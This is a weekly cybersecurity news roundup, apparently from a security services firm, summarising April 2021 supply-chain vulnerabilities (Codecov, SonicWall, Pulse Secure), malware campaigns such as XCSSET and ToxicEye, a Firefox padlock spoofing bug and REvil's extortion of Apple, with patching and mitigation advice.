The software and hardware supply chain is in the news again this week, with the announcement of vulnerabilities in the Pulse, SonicWall, and Codecov services and tools. We also highlight ongoing malware threats, including malware targeting the new Apple M-1 Macs, ad servers compromised with malware and the use of the Telegram app to control computers via malware called ToxicEye. Finally, we take a look at a threat spoofing the HTTPS padlock in the Firefox browser, how Google alerts can present malware and scams and a ransomware extortion threat by the REvil gang targeted at Apple.

• More Supply Chain Vulnerabilities Announced
• This Week in Malware
• Threat Roundup
• Final Words

More Dangerous Software/Hardware Supply Chain Attacks

Codecov software/credentials exploited; Zero-days in SonicWall security products; Pulse Secure VPN vulnerabilities under active attack

What You Need to Know

Once again, businesses and security professionals have to deal with supply chain vulnerabilities, as breaches and bugs associated with three different software and IT hardware suppliers dominate the news. A company that provides software testing services prior to public software release, announced that attackers had access to its network for at least a month and that malware had been discovered on one of its systems. A security hardware manufacturer released patches for three zero-day bugs affecting its hosted email security and on-premise security products. And researchers announced that nation-state threat actors tied to both the Chinese and Russian governments were actively exploiting vulnerabilities in some VPN appliances.

Summary

Last week, in an attack that is being likened to SolarWinds, businesses learned that a software solution provider and their customers have become yet another victim in the spate of supply chain attacks. Codecov, which provides coding coverage and software testing services to businesses, suffered a security breach related to one of its tools in late January 2021, that wasn’t discovered until early April by one of its customers. Investigators believe that the attackers succeeded in exploiting both the Codecov software as well as compromising hundreds of customer networks using automation. At risk data include customer credentials, such as tokens and API keys, services such as data stores and application code that could be accessed with the credentials, and git remote information of repositories using the Bash Uploader tool. Affected customers include at least 100 private businesses and nine U.S. government agencies.

Last week SonicWall, a security hardware manufacturer, advised customers to urgently patch three zero-day vulnerabilities affecting several of its products. The company indicated that the vulnerabilities were already being exploited in the wild and could give threat actors the ability to gain a “significant foothold” in a target’s network. The zero-days (CVE-2021-20021, CVE-2021-20022 and CVE-2021-20023) enable attackers to create administrative accounts and allow post-authenticated hackers to upload and read arbitrary files on a remote host. Affected products include Email Security version 10.0.4 through present for both Windows and Hardware/ESXi Virtual Appliance and Hosted Email Security versions 10.0.4 through the present. 

In the third significant supply chain attack disclosed last week, researchers announced that threat actors tied to the Chinese government have been exploiting vulnerabilities in the Pulse VPN appliances. One bug (labeled CVE-2021-22893) enables remote code execution (RCE) and is being used to gain administrator-level access to the appliances. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring any executive branch agency within the federal government to mitigate the Pulse vulnerabilities by Friday, April 23, 2021. Last week the U.S. National Security Agency (NSA) and the U.S. Federal Bureau of Investigation (FBI) also issued a joint release advising organizations of ongoing exploitation of another Pulse Connect Secure VPN product vulnerability (CVE-2019-11510) (along with bugs in other VPNs and appliances) by Russian Foreign Intelligence (SVR) actors (also known as APT29, Cozy Bear and The Dukes). Threat actors have also been discovered connecting to an organization’s network through the Pulse Secure VPN and then moving laterally to a SolarWinds Orion server to install malware dubbed Supernova. At least 12 malware families are associated with exploitation of the Pulse Secure VPN appliances. 

Next Steps

Each of the affected companies have issued recommendations and remediations for the vulnerabilities:

• Codecov said the internal issues have been fixed and states that it has notified all affected customers. It is also urging customers to update their credentials if they have not already done so.
• Customers of SonicWall’s Email Security products are being urged to update to versions 10.0.9.6173 (Windows) and 10.0.9.6177 (Hardware/ESXi Virtual Appliance).
• Pulse Secure has released a tool called Pulse Connect Secure (PCS) Integrity Assurance to check the integrity of the Pulse Connect Secure appliances. The NSA, CISA and the FBI are all urging businesses and government agencies to check their networks for Indicators of Compromise (IoCs) and apply mitigations.

This Week in Malware

Apple’s new M-1 Macs a target; 120 ad servers compromised; and Telegram abused to distribute ToxicEye

What You Need to Know

There were some interesting twists and turns on the malware front last week. Researchers discovered that threat actors have reengineered the XCSSET malware to target Apple’s M-1 chips. A malvertising campaign dubbed ‘Tag Barnakle’ has breached over 120 ad servers. And cybercriminals have started leveraging the messaging app Telegram to control computers via ToxicEye malware.

Summary

Researchers discovered a new Apple Mac threat last week targeting Xcode developers with a reengineered version of the XCSSET malware.  Threat actors have previously used XCSSET to spread through Xcode projects and exploit two zero-day vulnerabilities to launch ransomware and abscond with personal information. The latest version of the malware enables cybercriminals to steal cryptocurrency from M-1 Macs. The malware appears to be capable of bypassing macOS Big Sur security features and abuses the Safari browser to plant a Universal Cross-site Scripting (UXSS) injection from a command and control (C&C) server. The source of the malware seems to be applications downloaded from unofficial and disreputable sources.

In another interesting malware story, at least 120 ad servers were breached over the last year and installed with code that delivered malicious computer-based and mobile advertisements capable of redirecting victims websites containing malware and scamware. The targeted websites receive the fake ads through a hacked server. If a user clicks on the ad, they are then redirected to a malicious website that encourages the user to visit an app store containing fake security, safety, or VPN products.

A remote access trojan (RAT) dubbed ‘ToxicEye’ is exploiting the Telegram messaging app to take over victim’s machines. Researchers have discovered that computers infected with ToxicEye can be controlled via a Telegram messaging account. The malware can also install ransomware, take over file systems and leak data. Researchers have discovered no less than 130 attacks related to ToxicEye in the past ninety days. 

Next Steps

For the Apple M-1 threats, since they appear to be connected to unofficial applications, researchers are advising that users should only download apps from legitimate and official sources. If users or enterprises suspect infection from the ToxicEye malware, they are advised to search for “C:\Users\ToxicEye\rat.exe.” If the file is discovered, it should be immediately removed from the system. 

Threat Roundup

Firefox flaws, REvil extortion attempts and dangerous Google alerts

What You Need to Know

In other threat news, the Mozilla Foundation released Firefox 88 to fix a series of bugs, including one that allowed spoofing of its “padlock”—an HTTPS secure communications icon. The REvil ransomware gang attempted to put pressure on Apple last week when they found themselves thwarted by Apple product manufacturer Quanta Computer’s refusal to pay a ransom for stolen product blueprints. And researchers announced that Google Alerts is a haven for malware and scams, with certain alerts groups directing users to almost entirely malicious websites.

Summary

In an update to the popular Firefox browser, the Mozilla Foundation fixed 13 vulnerabilities, including one that allowed spoofing of the HTTPS secure communications padlock icon. Tracked as CVE-2021-23998, the bug affected consumer and corporate versions of the Firefox browser. While defined as a ‘moderate’ severity risk, the threat of this particular vulnerability shouldn’t be understated. The secure browsing or “padlock” icons used by Firefox, Safari, Chrome and other popular browsers indicate the level of security on the website itself. And while cybercriminals can easily obtain Transport Layer Security (TLS) and Secure Sockets Layer (SSL) certificates to indicate secure internet connections (HTTPS) on a malicious website, users do rely on the security indicators provided by browsers like Firefox and Chrome to ensure safe browsing and secure data sharing experiences.

The REvil ransomware gang went ahead and posted plans and schematics for old and new Apple computer products when Apple product manufacturer Quanta Computer refused to pay a $50 million dollar ransom for the stolen information. REvil also claims to possess data on both Quanta employees and customers. After Quanta refused to pay, REvil attempted to extort Apple. The criminal gang claims that Apple has until May 1^st to pay the ransom before additional documents will be leaked online. REvil operators also claim to be negotiating the sale of confidential drawings and gigabytes of personal data to other major brands.

And finally, in an informal but interesting study, researchers found that Google Alerts are rife with links to websites containing malware and scams. Cybercriminals appear to leverage the alerts by using a search engine optimization (SEO) technique called ‘cloaking’ that involves having the website display content that is different to visitors than what it displays to search engine spiders. In one test, the Google Alert set up by researchers returned almost entirely malicious websites.

Next Steps

Mozilla Firefox users are advised to update their browser to the latest version. To prevent users from visiting malicious websites (including those delivered through Google Alerts), businesses are advised to install antivirus and endpoint security that blocks malicious URLs.

Final Words

The complexity of today’s threats can be overwhelming. And while security researchers are continually contributing valuable research and knowledge about threats and mitigations, the sheer volume of information can make it impossible to stay on top of every update, risk, breach and attack. For example, last week there was confusion around a legitimate Twitter request, which many security professionals assumed to be a phishing attack.

The Department of Justice recently announced their intent to launch a task force to combat the growing ransomware threat , but the reality is that task forces and constant alerts about the latest malware and system or appliance vulnerabilities are likely arriving on the doorstep of already overburdened and understaffed security teams. 

While there is no single silver bullet to prevent cyberattacks, businesses can alleviate some of the burden by working with experienced security professionals in areas like cloud security architecture, identity and access management and vulnerability management and penetration testing. 

The path to better security isn’t about one person or one fix. It’s a team effort involving internal and external security professionals, employees and researchers to combat the dangerous threats delivered by today’s criminals.